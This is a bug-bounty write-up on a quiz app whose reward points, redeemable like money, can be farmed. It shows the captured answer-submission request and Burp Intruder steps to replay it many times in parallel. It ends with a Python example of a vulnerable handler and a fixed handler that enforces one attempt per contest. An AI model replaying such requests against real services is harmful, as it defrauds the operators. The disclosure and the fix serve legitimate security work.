Increasing reward points N number of times

Case Study

As this was a private program, all illustrations of vulnerabilities will be represented with the host as

The application lets users play quizzes and win reward points, which can be spent like money to play more quizzes.

example: 10 reward points = 1 Rs

To play a quiz you need to pay Rs 5, or you can pay 50 reward points, and so on. While registering you get 50 reward points for a first-time signup. There is also one free quiz per day where you can earn points.

example: 5 correct answers = 5 points, 10 correct answers = 10 points

The minimum number of correct answers needed to get reward points is 5.


Let's select a free quiz to earn some points. I managed to get 5 correct answers and was awarded 5 points.

HTTP request that submits your answers:

POST /endpoint HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1

csrf_test_name=SOME_ID&contestId=MY_ID&stage=SOME_RANDOM_ID&timeTaken=[ARRAY,TO,COLLECT,TIME ]&questionChoosen=[ ARRAY, OF , ANSWER, EXAMPLE, 1,2,2,3,4 ]&questionTime=["Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz"]&ans=on

Intercept the request and send it to Intruder.

Now increase the threads to 25, select the Null payload type in Intruder, and set the payload count to the number of times you want the reward points to increase.


There is no server-side check of whether the quiz has already been played. The server only counts the number of right answers and awards points, so every repeated submission of the same request is credited again.
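The root cause above is a missing attempt record, not the scoring itself. The following is an added example (not the program's code; all user, contest and column names are constructed) that puts the two handler shapes side by side: one that only scores the answers, as the write-up describes, and one that records the attempt under a UNIQUE (user, contest) constraint before crediting, so a replayed or concurrent submission for an already-played contest earns nothing. A small simulation fires the same submission 25 times in parallel against each handler and returns the resulting balance.

```python
"""Once-per-contest award check for a quiz endpoint (added example, not the program's code).

award_points_vulnerable: counts correct answers and credits points on every call,
    with no memory of earlier attempts (the behaviour described in the write-up).
award_points_fixed: inserts an attempts row first; the UNIQUE(user_id, contest_id)
    constraint rejects any second submission for the same contest, so the credit
    happens at most once no matter how many copies of the request arrive.
All identifiers below (users, contests, answer key) are constructed for this example.
"""
import sqlite3
import threading

MIN_CORRECT = 5                                 # page: at least 5 correct answers to earn points
ANSWER_KEY = [1, 2, 2, 3, 4, 1, 3, 2, 4, 1]     # constructed key for a 10-question quiz

# Serialises access to the single shared in-memory connection used by the simulation.
# It is NOT the fix: the vulnerable handler holds it too and still pays out every replay.
db_lock = threading.Lock()


def make_db():
    con = sqlite3.connect(":memory:", check_same_thread=False, isolation_level=None)
    con.execute("CREATE TABLE users (id TEXT PRIMARY KEY, points INTEGER NOT NULL)")
    # One row per (user, contest): this constraint is the replay check.
    con.execute("CREATE TABLE attempts (user_id TEXT, contest_id TEXT, earned INTEGER, "
                "UNIQUE(user_id, contest_id))")
    con.execute("INSERT INTO users VALUES ('alice', 50)")  # 50 signup points, per the page
    return con


def score(chosen):
    """Number of answers matching the key; below MIN_CORRECT nothing is earned."""
    correct = sum(1 for got, want in zip(chosen, ANSWER_KEY) if got == want)
    return correct


def points_for(correct):
    return correct if correct >= MIN_CORRECT else 0


def award_points_vulnerable(con, user_id, contest_id, chosen):
    """Credits points for every submission: nothing says this contest was already played."""
    earned = points_for(score(chosen))
    with db_lock:
        con.execute("UPDATE users SET points = points + ? WHERE id = ?", (earned, user_id))
    return earned


def award_points_fixed(con, user_id, contest_id, chosen):
    """Credits points at most once per (user, contest); a repeat returns 0."""
    earned = points_for(score(chosen))
    with db_lock:
        try:
            # Claim the attempt first. Duplicates fail here, before any balance change.
            con.execute("INSERT INTO attempts VALUES (?, ?, ?)", (user_id, contest_id, earned))
        except sqlite3.IntegrityError:
            return 0  # already played: replayed or duplicated request
        con.execute("UPDATE users SET points = points + ? WHERE id = ?", (earned, user_id))
    return earned


def replay(con, handler, n, user_id="alice", contest_id="free-quiz-day1"):
    """Fires n identical, fully correct submissions from n threads and returns the balance."""
    chosen = list(ANSWER_KEY)  # 10 correct answers -> 10 points if credited
    threads = [threading.Thread(target=handler, args=(con, user_id, contest_id, chosen))
               for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return con.execute("SELECT points FROM users WHERE id = ?", (user_id,)).fetchone()[0]


if __name__ == "__main__":
    print("vulnerable, 25 replays:", replay(make_db(), award_points_vulnerable, 25))  # 300
    print("fixed,      25 replays:", replay(make_db(), award_points_fixed, 25))       # 60
```

The important ordering is in the fixed handler: the attempt row is written before the balance is touched, and the database constraint, not application-level "did we see this before" logic, decides whether the insert succeeds. In a real deployment the same check belongs inside one transaction with the balance update, and the contest identifier should be the server's own notion of which quiz (and which day, for the daily free quiz) the submission belongs to, never a value taken from the request alone.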

For queries, ping me on Twitter:

